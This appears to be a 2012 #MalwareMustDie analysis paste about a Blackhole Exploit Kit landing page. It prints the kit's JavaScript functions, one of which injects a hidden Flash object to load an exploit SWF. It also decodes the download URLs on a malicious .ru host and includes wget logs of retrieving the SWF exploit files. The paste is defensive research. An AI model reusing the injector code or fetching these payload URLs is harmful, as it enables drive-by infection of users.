#MalwareMustDie FLUSH3 - PluginDetect 0.7.9. Nov 25, 2012

1. =======================================
2. GET THE SWF EXPLOITER & INFECTOR
3. TEHRE ARE 2(TWO) FUNCTIONS RELATED...
4. #MalwareMustDie | @unixfreaxjp ~]$ date
5. Sun Nov 25 20:50:32 JST 2012
6. =======================================
7.  
8. //There is also two swf downloader function :
9.  
10.  function getCN()
11.  {
12.    return "/forum/links/column.php?seyjjv="+x("c833f")+"&apvpjz="+x("cvwyb")+"&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe"
13.  }
14.  
15. //let's crack the url provided in the function by the above method, result is the below download of SWF Exploit file :
16.  
17. http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
18.  
19. // download:
20.  
21. --17:24:41--  http://delemiator.ru:8080/forum/links/column.php?seyjjv=30:1n:1i:1i:33&apvpjz=30:3j:3k:3m:2w&mzb=2v:1k:1m:32:33:1k:1k:31:1j:1o&vsoyj=igoe
22.            => `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe'
23. Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
24. Connecting to delemiator.ru|208.87.243.131|:8080... connected.
25. HTTP request sent, awaiting response... 200 OK
26. Length: 5,969 (5.8K) [text/html]
27. 17:24:43 (128.15 MB/s) - `column.php@seyjjv=30%3A1n%3A1i%3A1i%3A33&apvpjz=30%3A3j%3A3k%3A3m%3A2w&mzb=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&vsoyj=igoe' saved [5969/5969]
28.  
29.  
30. // Here is another one ff2() to bring you to another download url, see below decoding process..
31.  
32. function ff2()
33.  {
34.    var oSpan=document.createElement("span");
35.    var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
36.    oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'>
37.   <param name='movie' value='"+url+"' />
38.   <param name='allowScriptAccess' value='always' />
39.   <param name='Play' value='0' />
40.   <embed src='"+url+"' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash' width='10' height='10'>
41.   </embed></object>";
42.    document.body.appendChild(oSpan);
43.  }
44.  
45. // focus into this: var url="/forum/links/column.php?cha="+x("c833f")+"&oqbqt="+x("yxjk")+"&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo";
46. // with "yxjk" is "3m:3l:37:38" we get the download url below, to download another
47.  
48. http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
49.  
50. --17:35:50--  http://delemiator.ru:8080/forum/links/column.php?cha=30:1n:1i:1i:33&oqbqt=3m:3l:37:38&hahphpgk=2v:1k:1m:32:33:1k:1k:31:1j:1o&pdwgygwj=liczqqdo
51.            => `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo'
52. Resolving delemiator.ru... 208.87.243.131, 202.180.221.186, 203.80.16.81
53. Connecting to delemiator.ru|208.87.243.131|:8080... connected.
54. HTTP request sent, awaiting response... 200 OK
55. Length: 3,043 (3.0K) [text/html]
56. 17:35:52 (87.29 MB/s) - `column.php@cha=30%3A1n%3A1i%3A1i%3A33&oqbqt=3m%3A3l%3A37%3A38&hahphpgk=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&pdwgygwj=liczqqdo' saved [3043/3043]
57.  
58. // The further hack into this BHEK2 infector show us that the static path of these two SWF
59. // infectors also exists as per below links with download PoC:
60.  
61. --17:39:41--  http://delemiator.ru:8080/forum/data/field.swf
62.            => `field.swf'
63. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
64. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
65. HTTP request sent, awaiting response... 200 OK
66. Length: 3,043 (3.0K) [application/x-shockwave-flash]
67. 17:39:44 (89.55 MB/s) - `field.swf' saved [3043/3043]
68.  
69.  
70. --17:39:54--  http://delemiator.ru:8080/forum/data/score.swf
71.            => `score.swf'
72. Resolving delemiator.ru... 202.180.221.186, 203.80.16.81, 208.87.243.131
73. Connecting to delemiator.ru|202.180.221.186|:8080... connected.
74. HTTP request sent, awaiting response... 200 OK
75. Length: 5,969 (5.8K) [application/x-shockwave-flash]
76. 17:39:56 (42.54 MB/s) - `score.swf' saved [5969/5969]
77.  
78. #MalwareMustDie!